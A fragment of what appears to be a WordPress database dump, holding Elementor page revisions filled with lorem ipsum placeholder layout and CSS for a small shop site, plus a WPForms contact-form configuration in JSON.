href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp\" alt=\"\" loading=\"lazy\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<figure><img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp\" alt=\"\" loading=\"lazy\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<figure><img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp\" alt=\"\" loading=\"lazy\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<h2>Add Your Heading Text Here</h2>		\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<h2>Add Your Heading Text Here</h2>		\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo</p><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"612\" height=\"408\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1.jpg 612w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-300x200.jpg 300w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-50x33.jpg 50w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-48x32.jpg 48w\" sizes=\"(max-width: 612px) 100vw, 612px\" />															\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-accordion{text-align:left}.elementor-accordion .elementor-accordion-item{border:1px solid #d4d4d4}.elementor-accordion .elementor-accordion-item+.elementor-accordion-item{border-top:none}.elementor-accordion .elementor-tab-title{margin:0;padding:15px 20px;font-weight:700;line-height:1;cursor:pointer;outline:none}.elementor-accordion .elementor-tab-title .elementor-accordion-icon{display:inline-block;width:1.5em}.elementor-accordion .elementor-tab-title .elementor-accordion-icon svg{width:1em;height:1em}.elementor-accordion .elementor-tab-title .elementor-accordion-icon.elementor-accordion-icon-right{float:right;text-align:right}.elementor-accordion .elementor-tab-title .elementor-accordion-icon.elementor-accordion-icon-left{float:left;text-align:left}.elementor-accordion .elementor-tab-title .elementor-accordion-icon .elementor-accordion-icon-closed{display:block}.elementor-accordion .elementor-tab-title .elementor-accordion-icon .elementor-accordion-icon-opened,.elementor-accordion .elementor-tab-title.elementor-active .elementor-accordion-icon-closed{display:none}.elementor-accordion .elementor-tab-title.elementor-active .elementor-accordion-icon-opened{display:block}.elementor-accordion .elementor-tab-content{display:none;padding:15px 20px;border-top:1px solid #d4d4d4}@media (max-width:767px){.elementor-accordion .elementor-tab-title{padding:12px 15px}.elementor-accordion .elementor-tab-title .elementor-accordion-icon{width:1.2em}.elementor-accordion .elementor-tab-content{padding:7px 15px}}.e-container>.elementor-widget-accordion{width:var(--container-widget-width,100%)}</style>		\n												<a href=\"\">Accordion #1</a>\n					Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\n												<a href=\"\">Accordion #2</a>\n					Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\n												<a href=\"\">Accordion Title</a>\n					Accordion Content\n												<a href=\"\">Accordion Title</a>\n					Accordion Content\n			<h2>Add Your Heading Text Here</h2>		\n															<img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1024x640.webp\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1024x640.webp 1024w, https://gopalak.in/wp-content/uploads/2022/09/279356-300x188.webp 300w, https://gopalak.in/wp-content/uploads/2022/09/279356-768x480.webp 768w, https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp 1536w, https://gopalak.in/wp-content/uploads/2022/09/279356-50x31.webp 50w, https://gopalak.in/wp-content/uploads/2022/09/279356-48x30.webp 48w, https://gopalak.in/wp-content/uploads/2022/09/279356.webp 1920w\" sizes=\"(max-width: 640px) 100vw, 640px\" />															\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-divider{--divider-border-style:none;--divider-border-width:1px;--divider-color:#2c2c2c;--divider-icon-size:20px;--divider-element-spacing:10px;--divider-pattern-height:24px;--divider-pattern-size:20px;--divider-pattern-url:none;--divider-pattern-repeat:repeat-x}.elementor-widget-divider .elementor-divider{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-divider .elementor-divider__text{font-size:15px;line-height:1;max-width:95%}.elementor-widget-divider .elementor-divider__element{margin:0 var(--divider-element-spacing);-ms-flex-negative:0;flex-shrink:0}.elementor-widget-divider .elementor-icon{font-size:var(--divider-icon-size)}.elementor-widget-divider .elementor-divider-separator{display:-webkit-box;display:-ms-flexbox;display:flex;margin:0;direction:ltr}.elementor-widget-divider--view-line_icon .elementor-divider-separator,.elementor-widget-divider--view-line_text .elementor-divider-separator{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-divider--view-line_icon .elementor-divider-separator:after,.elementor-widget-divider--view-line_icon .elementor-divider-separator:before,.elementor-widget-divider--view-line_text .elementor-divider-separator:after,.elementor-widget-divider--view-line_text .elementor-divider-separator:before{display:block;content:\"\";border-bottom:0;-webkit-box-flex:1;-ms-flex-positive:1;flex-grow:1;border-top:var(--divider-border-width) var(--divider-border-style) var(--divider-color)}.elementor-widget-divider--element-align-left .elementor-divider .elementor-divider-separator>.elementor-divider__svg:first-of-type{-webkit-box-flex:0;-ms-flex-positive:0;flex-grow:0;-ms-flex-negative:100;flex-shrink:100}.elementor-widget-divider--element-align-left .elementor-divider-separator:before{content:none}.elementor-widget-divider--element-align-left .elementor-divider__element{margin-left:0}.elementor-widget-divider--element-align-right .elementor-divider .elementor-divider-separator>.elementor-divider__svg:last-of-type{-webkit-box-flex:0;-ms-flex-positive:0;flex-grow:0;-ms-flex-negative:100;flex-shrink:100}.elementor-widget-divider--element-align-right .elementor-divider-separator:after{content:none}.elementor-widget-divider--element-align-right .elementor-divider__element{margin-right:0}.elementor-widget-divider:not(.elementor-widget-divider--view-line_text):not(.elementor-widget-divider--view-line_icon) .elementor-divider-separator{border-top:var(--divider-border-width) var(--divider-border-style) var(--divider-color)}.elementor-widget-divider--separator-type-pattern{--divider-border-style:none}.elementor-widget-divider--separator-type-pattern.elementor-widget-divider--view-line .elementor-divider-separator,.elementor-widget-divider--separator-type-pattern:not(.elementor-widget-divider--view-line) .elementor-divider-separator:after,.elementor-widget-divider--separator-type-pattern:not(.elementor-widget-divider--view-line) .elementor-divider-separator:before,.elementor-widget-divider--separator-type-pattern:not([class*=elementor-widget-divider--view]) .elementor-divider-separator{width:100%;min-height:var(--divider-pattern-height);-webkit-mask-size:var(--divider-pattern-size) 100%;mask-size:var(--divider-pattern-size) 100%;-webkit-mask-repeat:var(--divider-pattern-repeat);mask-repeat:var(--divider-pattern-repeat);background-color:var(--divider-color);-webkit-mask-image:var(--divider-pattern-url);mask-image:var(--divider-pattern-url)}.elementor-widget-divider--no-spacing{--divider-pattern-size:auto}.elementor-widget-divider--bg-round{--divider-pattern-repeat:round}.rtl .elementor-widget-divider .elementor-divider__text{direction:rtl}.e-container>.elementor-widget-divider{width:var(--container-widget-width,100%);--flex-grow:var(--container-widget-flex-grow,0)}</style>		\n															<img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1024x640.webp\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1024x640.webp 1024w, https://gopalak.in/wp-content/uploads/2022/09/279356-300x188.webp 300w, https://gopalak.in/wp-content/uploads/2022/09/279356-768x480.webp 768w, https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp 1536w, https://gopalak.in/wp-content/uploads/2022/09/279356-50x31.webp 50w, https://gopalak.in/wp-content/uploads/2022/09/279356-48x30.webp 48w, https://gopalak.in/wp-content/uploads/2022/09/279356.webp 1920w\" sizes=\"(max-width: 640px) 100vw, 640px\" />															\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1024x640.webp\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1024x640.webp 1024w, https://gopalak.in/wp-content/uploads/2022/09/279356-300x188.webp 300w, https://gopalak.in/wp-content/uploads/2022/09/279356-768x480.webp 768w, https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp 1536w, https://gopalak.in/wp-content/uploads/2022/09/279356-50x31.webp 50w, https://gopalak.in/wp-content/uploads/2022/09/279356-48x30.webp 48w, https://gopalak.in/wp-content/uploads/2022/09/279356.webp 1920w\" sizes=\"(max-width: 640px) 100vw, 640px\" />															\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1024x640.webp\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1024x640.webp 1024w, https://gopalak.in/wp-content/uploads/2022/09/279356-300x188.webp 300w, https://gopalak.in/wp-content/uploads/2022/09/279356-768x480.webp 768w, https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp 1536w, https://gopalak.in/wp-content/uploads/2022/09/279356-50x31.webp 50w, https://gopalak.in/wp-content/uploads/2022/09/279356-48x30.webp 48w, https://gopalak.in/wp-content/uploads/2022/09/279356.webp 1920w\" sizes=\"(max-width: 640px) 100vw, 640px\" />															\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1024x640.webp\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1024x640.webp 1024w, https://gopalak.in/wp-content/uploads/2022/09/279356-300x188.webp 300w, https://gopalak.in/wp-content/uploads/2022/09/279356-768x480.webp 768w, https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp 1536w, https://gopalak.in/wp-content/uploads/2022/09/279356-50x31.webp 50w, https://gopalak.in/wp-content/uploads/2022/09/279356-48x30.webp 48w, https://gopalak.in/wp-content/uploads/2022/09/279356.webp 1920w\" sizes=\"(max-width: 640px) 100vw, 640px\" />															\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1024x640.webp\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1024x640.webp 1024w, https://gopalak.in/wp-content/uploads/2022/09/279356-300x188.webp 300w, https://gopalak.in/wp-content/uploads/2022/09/279356-768x480.webp 768w, https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp 1536w, https://gopalak.in/wp-content/uploads/2022/09/279356-50x31.webp 50w, https://gopalak.in/wp-content/uploads/2022/09/279356-48x30.webp 48w, https://gopalak.in/wp-content/uploads/2022/09/279356.webp 1920w\" sizes=\"(max-width: 640px) 100vw, 640px\" />															\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<h2>Add Your Heading Text Here</h2>		\n		<p><strong>Lorem Ipsum</strong> is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Know More\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-testimonial-wrapper{overflow:hidden;text-align:center}.elementor-testimonial-wrapper .elementor-testimonial-content{font-size:1.3em;margin-bottom:20px}.elementor-testimonial-wrapper .elementor-testimonial-name{line-height:1.5;display:block}.elementor-testimonial-wrapper .elementor-testimonial-job{font-size:.85em;display:block}.elementor-testimonial-wrapper .elementor-testimonial-meta{width:100%;line-height:1}.elementor-testimonial-wrapper .elementor-testimonial-meta-inner{display:inline-block}.elementor-testimonial-wrapper .elementor-testimonial-meta .elementor-testimonial-details,.elementor-testimonial-wrapper .elementor-testimonial-meta .elementor-testimonial-image{display:table-cell;vertical-align:middle}.elementor-testimonial-wrapper .elementor-testimonial-meta .elementor-testimonial-image img{width:60px;height:60px;border-radius:50%;-o-object-fit:cover;object-fit:cover;max-width:none}.elementor-testimonial-wrapper .elementor-testimonial-meta.elementor-testimonial-image-position-aside .elementor-testimonial-image{padding-right:15px}.elementor-testimonial-wrapper .elementor-testimonial-meta.elementor-testimonial-image-position-aside .elementor-testimonial-details{text-align:left}.elementor-testimonial-wrapper .elementor-testimonial-meta.elementor-testimonial-image-position-top .elementor-testimonial-details,.elementor-testimonial-wrapper .elementor-testimonial-meta.elementor-testimonial-image-position-top .elementor-testimonial-image{display:block}.elementor-testimonial-wrapper .elementor-testimonial-meta.elementor-testimonial-image-position-top .elementor-testimonial-image{margin-bottom:20px}</style>		\n							Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\n							<img src=\"https://gopalak.in/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />						\n														John Doe\n																						Designer\n							Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\n							<img src=\"https://gopalak.in/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />						\n														John Doe\n																						Designer\n							Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\n							<img src=\"https://gopalak.in/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />						\n														John Doe\n																						Designer\n							Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\n							<img src=\"https://gopalak.in/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />						\n														John Doe\n																						Designer\n			<h1>Add Your Heading Text Here</h1>		\n		<h4><strong>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</strong></h4>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<h4>Address</h4>		\n			 B-55, NGEF Industrial Ancillary Estate, <br>Mahadevapura, Bangalore 560048<br>\nContact : (+91)7259272171<br>\nE-mail id: mango@homedirect.in','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-10-03 12:20:43','2022-10-03 06:50:43','',1373,'https://gopalak.in/?p=1525',0,'revision','',0),(1526,1,'2022-10-03 12:20:43','2022-10-03 06:50:43','<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Add Your Heading Text Here</h2>		\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp\" alt=\"\" loading=\"lazy\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<figure><img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp\" alt=\"\" loading=\"lazy\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<figure><img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp\" alt=\"\" loading=\"lazy\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<h2>Add Your Heading Text Here</h2>		\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<link rel=\"stylesheet\" href=\"https://gopalak.in/wp-content/plugins/elementor/assets/css/widget-icon-box.min.css\">		\n				<h3>\n						This is the heading					\n				</h3>\n									<p>\n						Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.					</p>\n				<h3>\n						This is the heading					\n				</h3>\n									<p>\n						Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.					</p>\n				<h3>\n						This is the heading					\n				</h3>\n									<p>\n						Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.					</p>\n				<h3>\n						This is the heading					\n				</h3>\n									<p>\n						Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.					</p>\n			<h2>Gallery</h2>		\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-carousel .swiper-container{position:static}.elementor-widget-image-carousel .swiper-container .swiper-slide figure{line-height:inherit}.elementor-widget-image-carousel .swiper-slide{text-align:center}.elementor-image-carousel-wrapper:not(.swiper-container-initialized) .swiper-slide{max-width:calc(100% / var(--e-image-carousel-slides-to-show, 3))}</style>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/banner1-150x150.jpg\" alt=\"banner1\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/cows-farming-on-green-meadow-260nw-1704884002-150x150.webp\" alt=\"cows-farming-on-green-meadow-260nw-1704884002\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/803471-150x150.jpg\" alt=\"803471\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-150x150.webp\" alt=\"279356\" /></figure>			\n												Previous\n												Next\n			<h1>Add Your Heading Text Here</h1>		\n		<h4><strong>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</strong></h4>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<h4>Address</h4>		\n			 B-55, NGEF Industrial Ancillary Estate, <br>Mahadevapura, Bangalore 560048<br>\nContact : (+91)7259272171<br>\nE-mail id: mango@homedirect.in','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-10-03 12:20:43','2022-10-03 06:50:43','',1373,'https://gopalak.in/?p=1526',0,'revision','',0),(1527,1,'2022-10-03 12:54:11','2022-10-03 07:24:11','{\"fields\":[{\"id\":\"0\",\"type\":\"name\",\"label\":\"Name\",\"format\":\"first-last\",\"description\":\"\",\"required\":\"1\",\"size\":\"medium\",\"simple_placeholder\":\"\",\"simple_default\":\"\",\"first_placeholder\":\"\",\"first_default\":\"\",\"middle_placeholder\":\"\",\"middle_default\":\"\",\"last_placeholder\":\"\",\"last_default\":\"\",\"css\":\"\"},{\"id\":\"1\",\"type\":\"email\",\"label\":\"Email\",\"description\":\"\",\"required\":\"1\",\"size\":\"medium\",\"placeholder\":\"\",\"confirmation_placeholder\":\"\",\"default_value\":false,\"filter_type\":\"\",\"allowlist\":\"\",\"denylist\":\"\",\"css\":\"\"},{\"id\":\"2\",\"type\":\"textarea\",\"label\":\"Comment or Message\",\"description\":\"\",\"size\":\"medium\",\"placeholder\":\"\",\"limit_count\":\"1\",\"limit_mode\":\"characters\",\"default_value\":\"\",\"css\":\"\"}],\"id\":\"1527\",\"field_id\":3,\"settings\":{\"form_title\":\"Enquiry\",\"form_desc\":\"\",\"submit_text\":\"Submit\",\"submit_text_processing\":\"Sending...\",\"antispam\":\"1\",\"form_class\":\"\",\"submit_class\":\"\",\"ajax_submit\":\"1\",\"notification_enable\":\"1\",\"notifications\":{\"1\":{\"email\":\"{admin_email}\",\"subject\":\"New Entry: Enquiry\",\"sender_name\":\"MangoMitra\",\"sender_address\":\"mango@homedirect.in\",\"replyto\":\"{field_id=\\\"1\\\"}\",\"message\":\"{all_fields}\"}},\"confirmations\":{\"1\":{\"type\":\"message\",\"message\":\"<p>Thanks for contacting us! We will be in touch with you shortly.<\\/p>\",\"message_scroll\":\"1\",\"page\":\"560\",\"redirect\":\"\"}},\"form_tags\":[]},\"meta\":{\"template\":\"simple-contact-form-template\"}}','Enquiry','','publish','closed','closed','','enquiry','','','2022-10-03 12:54:26','2022-10-03 07:24:26','',0,'https://gopalak.in/?post_type=wpforms&#038;p=1527',0,'wpforms','',0);
